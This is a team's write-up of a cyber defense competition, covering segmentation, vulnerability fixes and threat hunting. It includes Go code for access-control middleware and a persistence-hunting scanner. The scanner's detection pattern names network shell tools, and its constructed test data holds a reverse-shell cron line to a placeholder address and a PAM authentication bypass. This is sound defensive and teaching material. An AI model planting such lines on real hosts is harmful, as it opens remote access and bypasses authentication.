Dec 6, 2025 Cyber Defense Competition

ISEAGE C3 Fall 2025 CDC

2nd Place
Out of 10+ competing teams

717.20 Final Score
Total competition score

93.8% Service Availability
Uptime maintained under attack

7 Systems Defended
Over 8 hours of active red team attacks
01

Competition Overview

The scenario was a fictional TV news station whose infrastructure had already been compromised. The job was not to prevent an attack that had already happened, but to find what was left behind, fix it, and hold the line against an active red team for 8 hours.

Drake's 8-person team placed 2nd out of 10+ at ISEAGE C3 Fall 2025, finishing with a 717.20 score and 93.8% service availability across 7 systems under continuous attack. The white team documentation score hit 93/100 — thorough incident reporting while the network was still under fire.

The network ran in three tiers: MGMT for privileged access and monitoring, INTERNAL for Active Directory and core services, and UNTRUSTED as the DMZ facing simulated internet and red team external attacks. OPNsense enforced the zone boundaries.

02

Network Architecture

MGMT Zone

Management network holding the OPNsense admin interface, monitoring hosts, and privileged workstations. Access was locked to whitelisted IPs. If the red team got here, the game was over.

INTERNAL Zone

Core business infrastructure: Windows Server 2019 with Active Directory, the Go API backend, MySQL databases, and file servers. Fully isolated from UNTRUSTED by OPNsense zone rules.

UNTRUSTED Zone

The DMZ. Public-facing Nuxt/Vue web app, mail server, and external API endpoints. This zone faced simulated internet traffic and all red team external attack vectors.

OPNsense Firewall

Central enforcement for all three zones with zone-to-zone rules, IDS/IPS, and full traffic logging. Default-deny policy with least-privilege allow rules written explicitly for each service.

03

Vulnerability Remediations

SQL Injection (CWE-89)

The Go API was concatenating unsanitized user input directly into SQL queries. Any request through the UNTRUSTED-zone endpoints could read or write the full MySQL database.

Fix. Replaced string concatenation with prepared statements and parameterized queries throughout the API. Added input validation middleware and WAF rules on OPNsense to catch SQLi patterns at the network boundary.

API Key Exposure (CWE-200)

Sensitive API keys were committed to the application repository and accessible through public configuration endpoints. Anyone who found the endpoint had valid credentials.

Fix. Rotated all exposed credentials immediately. Migrated secrets to environment variables, removed them from git history, and applied file permission controls to prevent configuration files from being publicly readable.

Broken Access Control (CWE-862)

Admin endpoints had no authorization checks. Any authenticated user, including low-privilege accounts, could access user management and system configuration functions.

Fix. Added role-based access control middleware to all admin routes. Enforced privilege separation through Active Directory group policy to ensure standard users and administrators can't reach each other's functions.
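An added example of that middleware, written for this write-up and not taken from the team's API: the unprotected admin routes are the "before" (a bare handler on the mux), and wrapping them in `RequireRole` is the fix. The route paths, the role names and the `X-Demo-Role` header are assumptions; the header exists only so the example runs offline and stands in for the session or AD-group lookup that would supply the role in the real service.

```go
package main

import (
	"context"
	"fmt"
	"net/http"
	"net/http/httptest"
)

type Role string

const (
	RoleUser  Role = "user"
	RoleAdmin Role = "admin"
)

// Satisfies encodes the privilege separation: an admin may use user-level
// routes, a user can never reach admin routes, unknown roles reach nothing.
func (r Role) Satisfies(required Role) bool {
	switch required {
	case RoleUser:
		return r == RoleUser || r == RoleAdmin
	case RoleAdmin:
		return r == RoleAdmin
	}
	return false
}

type roleKey struct{}

// WithRole resolves the caller's role and stores it in the request context.
// Assumed demo mechanism: the role is read from X-Demo-Role so this runs
// offline. In production it must come from the authenticated session, never
// from a client-controlled header, or the check is trivially bypassed.
func WithRole(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if h := r.Header.Get("X-Demo-Role"); h != "" {
			r = r.WithContext(context.WithValue(r.Context(), roleKey{}, Role(h)))
		}
		next.ServeHTTP(w, r)
	})
}

func RoleFromContext(ctx context.Context) (Role, bool) {
	r, ok := ctx.Value(roleKey{}).(Role)
	return r, ok
}

// RequireRole is the authorization check the admin endpoints were missing:
// no identity -> 401, identity without the needed role -> 403.
func RequireRole(required Role, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		role, ok := RoleFromContext(r.Context())
		if !ok {
			http.Error(w, "authentication required", http.StatusUnauthorized)
			return
		}
		if !role.Satisfies(required) {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// NewRouter wires every admin route behind RequireRole(RoleAdmin).
func NewRouter() http.Handler {
	ok := func(name string) http.Handler {
		return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			fmt.Fprintln(w, name, "ok")
		})
	}
	mux := http.NewServeMux()
	mux.Handle("/admin/users", RequireRole(RoleAdmin, ok("user management")))
	mux.Handle("/admin/config", RequireRole(RoleAdmin, ok("system configuration")))
	mux.Handle("/profile", RequireRole(RoleUser, ok("profile")))
	return WithRole(mux)
}

// Probe sends one request through the router and returns the HTTP status.
func Probe(h http.Handler, role, path string) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if role != "" {
		req.Header.Set("X-Demo-Role", role)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	h := NewRouter()
	for _, c := range []struct{ role, path string }{
		{"", "/admin/users"}, {"user", "/admin/users"}, {"admin", "/admin/users"}, {"user", "/profile"},
	} {
		fmt.Printf("role=%-7q %-14s -> %d\n", c.role, c.path, Probe(h, c.role, c.path))
	}
}
```

The important design point is that the check is attached at the router, not inside each handler: a new admin route added later cannot forget it without being visibly outside the `RequireRole` wrapper, which is the code-level counterpart of the AD group policy enforcement mentioned above.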

Hardcoded Credentials (CWE-798)

Default and hardcoded credentials were in use across database accounts, service accounts, and network device admin interfaces. A red team that knew one default got access to several services simultaneously.

Fix. Full audit of all services for default credentials, forced rotation, Active Directory GPO password policy enforcement, and deactivation of every unused service account.

04

Threat Hunting Findings

Persistence Mechanisms

WMI Subscriptions: Red team persistence via Event Consumers
Malicious Cron Jobs: Reverse shell scheduled on Linux hosts
LD_PRELOAD Backdoors: Shared library injection for privilege
PAM Misconfigs: Modified PAM stack for auth bypass

Systems Defended

Windows Server 2019: Active Directory domain controller
Ubuntu / Debian: Linux application servers
Nuxt / Vue: Public-facing web application
Go API + MySQL: Backend API and database

Scoring Breakdown

717.20 pts: Total final score (2nd place)
93 / 100: White team documentation score
93.8%: Service availability maintained
8 hours: Active defense window

05

Key Learnings

When a live red team is actively poking your systems, triage becomes the entire game. Fixing the wrong thing first is worse than fixing nothing.

01

Priority triage under fire is a skill that can't be learned from labs. Deciding what to fix first when everything is broken simultaneously takes practice with real stakes.

02

WMI subscriptions, malicious cron jobs, LD_PRELOAD injections, and PAM modifications are invisible to most monitoring tools. You have to know where to look manually.
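Where to look, for the three Linux mechanisms listed under Persistence Mechanisms above: an added hunting routine written for this write-up, not a tool the team used. It reads `/etc/ld.so.preload`, the system and per-user cron locations, and `/etc/pam.d/*` under a root you point it at (a live `/`, or a mounted image), and flags the file-content indicators of each mechanism. The file contents it seeds for the demo are constructed, the outbound address is from the documentation range 203.0.113.0/24, and the specific regexes are assumptions about what a reverse-shell cron line or a PAM bypass looks like, not a complete signature set. WMI event subscriptions are the Windows counterpart and are not covered here.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Finding is one suspicious artifact located under the inspected root.
type Finding struct {
	Kind string // "ld_preload", "cron" or "pam"
	File string
	Line string
}

// suspiciousCron: fragments with no business in an app-server cron job
// (bash raw-TCP device, netcat exec, socat, named pipes). Assumed patterns.
var suspiciousCron = regexp.MustCompile(`/dev/tcp/|\bnc\b.*\s-e\b|\bncat\b|\bsocat\b|\bmkfifo\b`)

// pamPermitAuth: an auth line that lets pam_permit decide, which
// short-circuits password checking for every service using that stack.
var pamPermitAuth = regexp.MustCompile(`^\s*auth\s+(sufficient|required|\[.*\])\s+pam_permit\.so`)

// scanLines calls fn for every line of a regular file; directories and
// missing files are skipped silently so globs can be passed in freely.
func scanLines(path string, fn func(line string)) error {
	st, err := os.Stat(path)
	if err != nil || st.IsDir() {
		return err
	}
	f, err := os.Open(path)
	if err != nil {
		return err
	}
	defer f.Close()
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		fn(sc.Text())
	}
	return sc.Err()
}

// HuntRoot inspects the tree under root for the three Linux persistence
// mechanisms that leave file-content evidence.
func HuntRoot(root string) []Finding {
	var out []Finding
	// 1. Any non-comment path in ld.so.preload is injected into every
	//    dynamically linked process on the host.
	preload := filepath.Join(root, "etc", "ld.so.preload")
	_ = scanLines(preload, func(l string) {
		if t := strings.TrimSpace(l); t != "" && !strings.HasPrefix(t, "#") {
			out = append(out, Finding{"ld_preload", preload, t})
		}
	})
	// 2. System crontab, drop-in directory and per-user spools.
	cronFiles := []string{filepath.Join(root, "etc", "crontab")}
	for _, pat := range []string{"etc/cron.d/*", "var/spool/cron/crontabs/*", "var/spool/cron/*"} {
		m, _ := filepath.Glob(filepath.Join(root, pat))
		cronFiles = append(cronFiles, m...)
	}
	for _, cf := range cronFiles {
		cf := cf
		_ = scanLines(cf, func(l string) {
			if !strings.HasPrefix(strings.TrimSpace(l), "#") && suspiciousCron.MatchString(l) {
				out = append(out, Finding{"cron", cf, strings.TrimSpace(l)})
			}
		})
	}
	// 3. PAM stacks: pam_permit in an auth line is an authentication bypass.
	pamFiles, _ := filepath.Glob(filepath.Join(root, "etc", "pam.d", "*"))
	for _, pf := range pamFiles {
		pf := pf
		_ = scanLines(pf, func(l string) {
			if pamPermitAuth.MatchString(l) {
				out = append(out, Finding{"pam", pf, strings.TrimSpace(l)})
			}
		})
	}
	return out
}

// SeedSample writes a constructed fake root with one clean and one bad
// example of each artifact so the hunt can be exercised offline. Test data only.
func SeedSample(root string) error {
	files := map[string]string{
		"etc/ld.so.preload":   "# constructed sample\n/usr/lib/x86_64-linux-gnu/libhelper.so\n",
		"etc/cron.d/backup":   "0 2 * * * root /usr/local/bin/backup.sh\n",
		"etc/cron.d/sysupdate": "* * * * * root /bin/bash -c 'exec 5<>/dev/tcp/203.0.113.5/4444'\n",
		"etc/pam.d/sshd":      "auth sufficient pam_permit.so\nauth required pam_unix.so\n",
		"etc/pam.d/login":     "auth required pam_unix.so\n",
	}
	for rel, body := range files {
		p := filepath.Join(root, rel)
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			return err
		}
		if err := os.WriteFile(p, []byte(body), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	root, err := os.MkdirTemp("", "hunt-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	if err := SeedSample(root); err != nil {
		panic(err)
	}
	for _, f := range HuntRoot(root) {
		fmt.Printf("[%s] %s: %s\n", f.Kind, f.File, f.Line)
	}
}
```

Against the seeded tree the routine reports exactly three findings: the preload library, the cron job with the `/dev/tcp/` fragment, and the `pam_permit.so` auth line in `sshd`, while the legitimate backup job and the untouched `login` stack stay quiet. On a real host the value is the fixed checklist of locations rather than the regexes; anything that appears in `ld.so.preload` or in front of `pam_unix.so` deserves a look regardless of its name.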

03

Network segmentation only works if the firewall rules are written correctly. A zone boundary with one misconfigured rule is the same as no boundary at all.

04

Documentation written during an active incident is more valuable than any post-mortem. The white team score proved that thorough real-time writing under pressure is a competitive advantage.